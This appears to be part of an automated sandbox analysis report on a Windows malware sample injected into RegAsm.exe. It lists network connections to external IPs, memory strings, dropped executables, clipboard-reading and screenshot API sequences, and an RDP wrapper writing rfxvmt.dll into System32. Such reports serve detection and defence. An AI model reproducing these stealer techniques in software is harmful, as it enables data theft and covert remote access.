Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.8:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.8:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.8:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.8:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49765 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: EBAAFCAFCB.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C7AB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7AB8C0 rand_s,NtQueryVirtualMemory,	3_2_6C7AB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C7AB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C74F280

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D00C40	0_2_00D00C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D933	3_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D1C3	3_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C472	3_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D561	3_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041950A	3_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DD1B	3_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CD2E	3_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B712	3_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7435A0	3_2_6C7435A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C755477	3_2_6C755477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B545C	3_2_6C7B545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B542B	3_2_6C7B542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C785C10	3_2_6C785C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7BAC00	3_2_6C7BAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C786CF0	3_2_6C786CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74D4E0	3_2_6C74D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C76D4D0	3_2_6C76D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7564C0	3_2_6C7564C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7A34A0	3_2_6C7A34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7AC4A0	3_2_6C7AC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C756C80	3_2_6C756C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C770512	3_2_6C770512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C76ED10	3_2_6C76ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C75FD00	3_2_6C75FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7A85F0	3_2_6C7A85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C780DD0	3_2_6C780DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74C670	3_2_6C74C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B6E63	3_2_6C7B6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C769E50	3_2_6C769E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C783E50	3_2_6C783E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C764640	3_2_6C764640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C792E4E	3_2_6C792E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7A9E30	3_2_6C7A9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C787E10	3_2_6C787E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C795600	3_2_6C795600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74BEF0	3_2_6C74BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C75FEF0	3_2_6C75FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B76E3	3_2_6C7B76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7A4EA0	3_2_6C7A4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C765E90	3_2_6C765E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7AE680	3_2_6C7AE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C787710	3_2_6C787710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C759F00	3_2_6C759F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C776FF0	3_2_6C776FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74DFE0	3_2_6C74DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7977A0	3_2_6C7977A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C78F070	3_2_6C78F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C768850	3_2_6C768850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C76D850	3_2_6C76D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C78B820	3_2_6C78B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C794820	3_2_6C794820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C757810	3_2_6C757810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C76C0E0	3_2_6C76C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7858E0	3_2_6C7858E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B50C7	3_2_6C7B50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7760A0	3_2_6C7760A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C79B970	3_2_6C79B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7BB170	3_2_6C7BB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C75D960	3_2_6C75D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C76A940	3_2_6C76A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C77D9B0	3_2_6C77D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74C9A0	3_2_6C74C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C785190	3_2_6C785190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7A2990	3_2_6C7A2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C789A60	3_2_6C789A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C761AF0	3_2_6C761AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C78E2F0	3_2_6C78E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C788AC0	3_2_6C788AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C75CAB0	3_2_6C75CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B2AB0	3_2_6C7B2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7422A0	3_2_6C7422A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C774AA0	3_2_6C774AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7BBA90	3_2_6C7BBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C75C370	3_2_6C75C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C745340	3_2_6C745340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7B53C8	3_2_6C7B53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74F380	3_2_6C74F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FAC60	3_2_6C7FAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C84ECD0	3_2_6C84ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B6C00	3_2_6C8B6C00
Source: C:\ProgramData\EBAAFCAFCB.exe	Code function: 9_2_01330C40	9_2_01330C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004103A8	12_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00447D38	12_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401000	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004480B0	12_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449120	12_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C1C0	12_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D250	12_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A231	12_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A230	12_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004012C7	12_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004452E0	12_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00415352	12_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407450	12_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00405470	12_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409402	12_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004404AB	12_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A510	12_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004115B0	12_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041D610	12_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449620	12_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A6E0	12_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B6B0	12_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043F700	12_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041E71A	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044B720	12_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004087F0	12_2_004087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00428833	12_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004338C0	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004408E6	12_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004038A0	12_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434990	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040ABA0	12_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042EBBC	12_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437CD0	12_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449D22	12_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407E50	12_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427E6C	12_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437F30	12_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042DFE0	12_2_0042DFE0
Source: C:\ProgramData\KECGDBFCBK.exe	Code function: 13_2_00F10C40	13_2_00F10C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2228226A	15_2_2228226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22289390	15_2_22289390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22289A20	15_2_22289A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2226AEBE	15_2_2226AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22289F80	15_2_22289F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221FA2C0	15_2_221FA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_222133E0	15_2_222133E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2221D100	15_2_2221D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_222161E0	15_2_222161E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_222216D0	15_2_222216D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221F9430	15_2_221F9430
